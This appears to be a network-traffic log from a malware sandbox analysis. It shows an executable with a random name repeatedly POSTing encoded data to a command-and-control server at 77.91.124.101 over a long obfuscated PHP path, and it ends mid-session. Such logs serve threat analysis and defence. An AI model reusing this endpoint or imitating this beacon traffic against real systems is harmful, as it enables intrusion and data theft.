Nov 21, 2023 04:47:54.853936911 CET	334	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:55.051373005 CET	336	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:55.051578045 CET	339	OUT	Data Raw: 52 5f 58 59 5e 5f 5a 5a 5d 57 55 57 55 59 57 5b 50 52 58 45 56 5e 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R_XY^_ZZ]WUWUYW[PRXEV^WX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'>)_?)U?^/B&_ (3:V0[:Q30R9&](?<8&G''^)
Nov 21, 2023 04:47:55.259167910 CET	339	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:54 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
42	77.91.124.101	80	192.168.2.5	49756	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:54.853936911 CET	334	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:55.051373005 CET	336	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:55.051578045 CET	339	OUT	Data Raw: 52 5f 58 59 5e 5f 5a 5a 5d 57 55 57 55 59 57 5b 50 52 58 45 56 5e 57 58 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R_XY^_ZZ]WUWUYW[PRXEV^WX^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'>)_?)U?^/B&_ (3:V0[:Q30R9&](?<8&G''^)
Nov 21, 2023 04:47:55.259167910 CET	339	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:54 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
43	192.168.2.5	49757	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:55.583935976 CET	340	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue
Nov 21, 2023 04:47:55.782804012 CET	341	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:55.789611101 CET	343	OUT	Data Raw: 57 5e 58 51 5b 5f 5a 51 5d 57 55 57 55 5d 57 51 50 59 58 48 56 51 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W^XQ[_ZQ]WUWU]WQPYXHVQW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$+8%(>R*#_8'9#:X+0&0=0=-++?#]->&G''^)+
Nov 21, 2023 04:47:55.996412992 CET	343	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:55 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
43	77.91.124.101	80	192.168.2.5	49757	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:55.583935976 CET	340	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue
Nov 21, 2023 04:47:55.782804012 CET	341	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:55.789611101 CET	343	OUT	Data Raw: 57 5e 58 51 5b 5f 5a 51 5d 57 55 57 55 5d 57 51 50 59 58 48 56 51 57 5d 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: W^XQ[_ZQ]WUWU]WQPYXHVQW]^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$+8%(>R*#_8'9#:X+0&0=0=-++?#]->&G''^)+
Nov 21, 2023 04:47:55.996412992 CET	343	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:55 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
44	77.91.124.101	80	192.168.2.5	49758	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:56.347644091 CET	344	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:56.545571089 CET	344	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:56.545799017 CET	347	OUT	Data Raw: 57 58 58 5c 5b 5e 5a 5b 5d 57 55 57 55 5c 57 57 50 52 58 42 56 5f 57 5e 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WXX\[^Z[]WUWU\WWPRXBV_W^^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=^"?+1>#.7-#9:(=$=$#%.><</>&G''^)/
Nov 21, 2023 04:47:56.750597000 CET	347	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:56 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
44	192.168.2.5	49758	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:56.347644091 CET	344	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:56.545571089 CET	344	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:56.545799017 CET	347	OUT	Data Raw: 57 58 58 5c 5b 5e 5a 5b 5d 57 55 57 55 5c 57 57 50 52 58 42 56 5f 57 5e 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WXX\[^Z[]WUWU\WWPRXBV_W^^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=^"?+1>#.7-#9:(=$=$#%.><</>&G''^)/
Nov 21, 2023 04:47:56.750597000 CET	347	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:56 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
45	192.168.2.5	49759	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:57.069133997 CET	348	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:57.268942118 CET	348	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:57.269268036 CET	351	OUT	Data Raw: 57 59 58 5d 5e 59 5a 5d 5d 57 55 57 55 5f 57 57 50 53 58 46 56 50 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WYX]^YZ]]WUWU_WWPSXFVPWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X*8=+"=Z/27)9+U)3.&0&,+9<,+Y,&G''^)#
Nov 21, 2023 04:47:57.475258112 CET	351	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:57 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
45	77.91.124.101	80	192.168.2.5	49759	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:57.069133997 CET	348	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:57.268942118 CET	348	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:57.269268036 CET	351	OUT	Data Raw: 57 59 58 5d 5e 59 5a 5d 5d 57 55 57 55 5f 57 57 50 53 58 46 56 50 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: WYX]^YZ]]WUWU_WWPSXFVPWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'X*8=+"=Z/27)9+U)3.&0&,+9<,+Y,&G''^)#
Nov 21, 2023 04:47:57.475258112 CET	351	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:57 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
46	77.91.124.101	80	192.168.2.5	49760	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:57.801287889 CET	352	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:57.998136044 CET	352	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:57.998382092 CET	355	OUT	Data Raw: 52 5a 5d 5c 5e 5d 5a 5a 5d 57 55 57 55 59 57 50 50 5f 58 49 56 51 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RZ]\^]ZZ]WUWUYWPP_XIVQWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=^)(81);$97)_?3-'-1&#>V.8*X<Z;->&G''^)
Nov 21, 2023 04:47:58.201750040 CET	355	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:57 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
46	192.168.2.5	49760	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:57.801287889 CET	352	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:57.998136044 CET	352	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:57.998382092 CET	355	OUT	Data Raw: 52 5a 5d 5c 5e 5d 5a 5a 5d 57 55 57 55 59 57 50 50 5f 58 49 56 51 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RZ]\^]ZZ]WUWUYWPP_XIVQWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=^)(81);$97)_?3-'-1&#>V.8*X<Z;->&G''^)
Nov 21, 2023 04:47:58.201750040 CET	355	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:57 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
47	192.168.2.5	49761	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:58.522582054 CET	356	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:58.720407963 CET	356	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:58.720709085 CET	359	OUT	Data Raw: 52 5a 58 5e 5e 59 5a 5e 5d 57 55 57 55 5c 57 5b 50 5c 58 42 56 54 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RZX^^YZ^]WUWU\W[P\XBVTWZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)8%_?8%?37]/]49*) 90>2Q39-(:^(<<8>&G''^)/
Nov 21, 2023 04:47:58.925018072 CET	359	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:58 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
47	77.91.124.101	80	192.168.2.5	49761	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:58.522582054 CET	356	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:58.720407963 CET	356	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:58.720709085 CET	359	OUT	Data Raw: 52 5a 58 5e 5e 59 5a 5e 5d 57 55 57 55 5c 57 5b 50 5c 58 42 56 54 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: RZX^^YZ^]WUWU\W[P\XBVTWZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)8%_?8%?37]/]49*) 90>2Q39-(:^(<<8>&G''^)/
Nov 21, 2023 04:47:58.925018072 CET	359	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:58 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
48	192.168.2.5	49762	77.91.124.101	80	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:59.236670971 CET	360	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:59.434784889 CET	360	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:59.434998035 CET	363	OUT	Data Raw: 52 5d 58 5a 5b 53 5a 5e 5d 57 55 57 55 5f 57 55 50 5a 58 42 56 57 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R]XZ[SZ^]WUWU_WUPZXBVWW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*_<1>07[89 &+3V0133>9;]</48&G''^)#
Nov 21, 2023 04:47:59.637718916 CET	363	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:59 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
48	77.91.124.101	80	192.168.2.5	49762	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:59.236670971 CET	360	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:47:59.434784889 CET	360	IN	HTTP/1.1 100 Continue
Nov 21, 2023 04:47:59.434998035 CET	363	OUT	Data Raw: 52 5d 58 5a 5b 53 5a 5e 5d 57 55 57 55 5f 57 55 50 5a 58 42 56 57 57 5b 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e Data Ascii: R]XZ[SZ^]WUWU_WUPZXBVWW[^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*_<1>07[89 &+3V0133>9;]</48&G''^)#
Nov 21, 2023 04:47:59.637718916 CET	363	IN	HTTP/1.1 200 OK Date: Tue, 21 Nov 2023 03:47:59 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 33 58 5b 55 Data Ascii: 3X[U

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
49	77.91.124.101	80	192.168.2.5	49763	C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe

Timestamp	kBytes transferred	Direction	Data
Nov 21, 2023 04:47:59.960717916 CET	364	OUT	POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 77.91.124.101 Content-Length: 2544 Expect: 100-continue Connection: Keep-Alive
Nov 21, 2023 04:48:00.159409046 CET	364	IN	HTTP/1.1 100 Continue
